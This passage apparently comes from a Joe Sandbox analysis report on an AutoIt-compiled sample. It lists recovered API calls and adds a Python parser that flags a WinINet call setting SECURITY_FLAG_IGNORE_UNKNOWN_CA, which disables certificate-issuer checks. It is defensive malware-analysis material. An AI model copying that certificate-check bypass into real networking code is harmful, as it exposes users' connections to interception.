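The WinINet record above is a complete HTTP request: InternetConnectW, HttpOpenRequestW, a read-then-write of option 0x1F, HttpSendRequestW and HttpQueryInfoW with info level 5. Option 0x1F is INTERNET_OPTION_SECURITY_FLAGS and info level 5 is HTTP_QUERY_CONTENT_LENGTH. InternetSetOptionW takes a pointer to a DWORD, not the DWORD itself, so the 00000100 the plugin recovered in the buffer slot is taken here as the buffer's contents rather than an address (0x100 is not a plausible pointer); under that reading the 4-byte write sets SECURITY_FLAG_IGNORE_UNKNOWN_CA, which makes the connection accept a server certificate from an untrusted issuer. Confirming that reading, and whether the path is reached at run time, requires the disassembly at 0044AB74 and the network capture. The Python below is an added example, not part of the Joe Sandbox report or the sample: it parses API lines in the report's own format (the six lines above are embedded verbatim as constructed input; a '?' is an argument the plugin could not resolve, and "Part of subcall function" lines are deliberately skipped), decodes the two constants, and flags any InternetSetOptionW call that relaxes certificate validation.

```python
import re

# Constructed input: the six API lines of the WinINet record above, copied
# verbatim in the report's own format (addresses are the report's).
REPORT_LINES = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
"""

# "• Api.MODULE(arg,arg,...), ref: ADDRESS"; subcall lines do not match and are skipped.
LINE_RE = re.compile(r"^\s*•\s*(\w+)\.(\w+)\(([^)]*)\)(?:,\s*ref:\s*([0-9A-Fa-f]+))?\s*$")

# wininet.h constants
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAG_NAMES = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00004000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00008000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS",
}
HTTP_QUERY_NAMES = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}


def parse_api_lines(text):
    """Parse report API lines into dicts; '?' (unresolved by the plugin) becomes None."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        api, module, argstr, ref = m.groups()
        args = ([None if a.strip() == "?" else int(a, 16) for a in argstr.split(",")]
                if argstr else [])
        calls.append({"api": api, "module": module, "args": args, "ref": ref})
    return calls


def security_flags_set(call):
    """Names of the certificate checks an InternetSetOptionW call switches off.

    Assumption (see lead-in): the recovered third argument is the DWORD the
    buffer holds, not the buffer's address.
    """
    if call["api"] != "InternetSetOptionW" or len(call["args"]) < 3:
        return []
    _, option, value = call["args"][:3]
    if option != INTERNET_OPTION_SECURITY_FLAGS or value is None:
        return []
    return [name for bit, name in SECURITY_FLAG_NAMES.items() if value & bit]


def find_cert_check_bypass(calls):
    """(ref, [flag names]) for every call that relaxes certificate validation."""
    return [(c["ref"], names) for c in calls for names in [security_flags_set(c)] if names]


def query_info_level(call):
    """Decode HttpQueryInfoW's dwInfoLevel (low word; high bits are modifiers)."""
    if call["api"] != "HttpQueryInfoW" or len(call["args"]) < 2 or call["args"][1] is None:
        return None
    level = call["args"][1] & 0xFFFF
    return HTTP_QUERY_NAMES.get(level, "HTTP_QUERY_%d" % level)


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    for ref, names in find_cert_check_bypass(parsed):
        print("certificate checks disabled at %s: %s" % (ref, ", ".join(names)))
    print("HttpQueryInfoW level:", query_info_level(parsed[-1]))
```

The parser is intentionally strict about the line shape so it can be pointed at a whole copied function listing without picking up the indented subcall entries; extend SECURITY_FLAG_NAMES and HTTP_QUERY_NAMES from wininet.h if other option values turn up in other records.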
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                • IsMenu.USER32(?), ref: 0045FC5F
                                                • CreatePopupMenu.USER32 ref: 0045FC97
                                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                • String ID: 0$2
                                                • API String ID: 93392585-3793063076
                                                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                APIs
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                • VariantClear.OLEAUT32(?), ref: 00435320
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                • VariantClear.OLEAUT32(?), ref: 004353B3
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                • String ID: crts
                                                • API String ID: 586820018-3724388283
                                                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                • _wcscat.LIBCMT ref: 0044BCAF
                                                • _wcslen.LIBCMT ref: 0044BCBB
                                                • _wcslen.LIBCMT ref: 0044BCD1
                                                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 2326526234-1173974218
                                                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                APIs
                                                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                • _wcslen.LIBCMT ref: 004335F2
                                                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                • GetLastError.KERNEL32 ref: 0043362B
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                • _wcsrchr.LIBCMT ref: 00433666
                                                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                • String ID: \
                                                • API String ID: 321622961-2967466578
                                                • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                • LoadStringW.USER32(00000000), ref: 00434060
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                • LoadStringW.USER32(00000000), ref: 00434078
                                                • _wprintf.LIBCMT ref: 004340A1
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                • __lock.LIBCMT ref: 00417981
                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                • __lock.LIBCMT ref: 004179A2
                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                • String ID: KERNEL32.DLL$pI
                                                • API String ID: 637971194-197072765
                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove$_malloc
                                                • String ID:
                                                • API String ID: 1938898002-0
                                                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                • _memmove.LIBCMT ref: 0044B555
                                                • _memmove.LIBCMT ref: 0044B578
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                • String ID:
                                                • API String ID: 2737351978-0
                                                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                • __calloc_crt.LIBCMT ref: 00415246
                                                • __getptd.LIBCMT ref: 00415253
                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                • _free.LIBCMT ref: 0041529E
                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                • String ID:
                                                • API String ID: 3638380555-0
                                                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$ClearErrorInitLast
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 3207048006-625585964
                                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                • gethostbyname.WSOCK32(?), ref: 004655A6
                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                • _memmove.LIBCMT ref: 004656CA
                                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                • WSACleanup.WSOCK32 ref: 00465762
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                • String ID:
                                                • API String ID: 2945290962-0
                                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                APIs
                                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                Similarity
                                                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                • String ID:
                                                • API String ID: 1457242333-0
